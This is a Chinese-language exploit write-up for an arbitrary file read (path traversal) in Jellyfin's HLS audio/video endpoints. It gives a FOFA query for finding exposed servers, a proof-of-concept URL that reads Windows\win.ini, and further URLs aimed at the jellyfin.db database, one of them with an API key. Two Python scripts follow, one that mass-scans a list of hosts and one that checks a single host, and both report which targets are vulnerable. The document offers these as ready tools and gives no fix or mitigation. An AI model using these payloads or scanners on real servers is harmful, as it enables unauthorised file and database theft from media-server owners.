FOFA语句:
title="Jellyfin"
可以通过访问
http://<url>/Audio/anything/hls/<文件路径>/stream.mp3/
读取任意文件。
POC:
http://xxx.xxx.xxx.xxx/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
Content-Type: application/octet-stream
其它URL:
/Audio/anything/hls/..datajellyfin.db/stream.mp3/ /Videos/anything/hls/m/..datajellyfin.db /Videos/anything/hls/..datajellyfin.db/stream.m3u8/?api_key=4c5750626da14b0a804977b09bf3d8f7
batch.py(python3)
#批量ip
import requests
import sys
import urllib3
urllib3.disable_warnings()
if len(sys.argv)!=2:
print('Usage: python3 xxx.py urls.txt')
sys.exit()
txt= sys.argv[1]
f=open(txt,'r+')
for i in f.readlines():
url=i.strip()
url=url+"/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/"
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36',
"Content-Type": "application/octet-stream"
}
response=requests.get(url,headers=headers,verify=False)
if response.status_code==200:
print(url+" "+"存在漏洞")
else:
print(url+" "+"不存在漏洞")
single.py(python3)
#单个ip
import requests
import sys
import urllib3
urllib3.disable_warnings()
if len(sys.argv)!=2:
print('Usage: python3 xxx.py http://xxx.xxx.xxx.xxx ')
sys.exit()
url= sys.argv[1]
url=url+"/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/"
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36',
"Content-Type": "application/octet-stream"
}
response=requests.get(url,headers=headers,verify=False)
if response.status_code==200:
print("存在漏洞")
else:
print("不存在漏洞")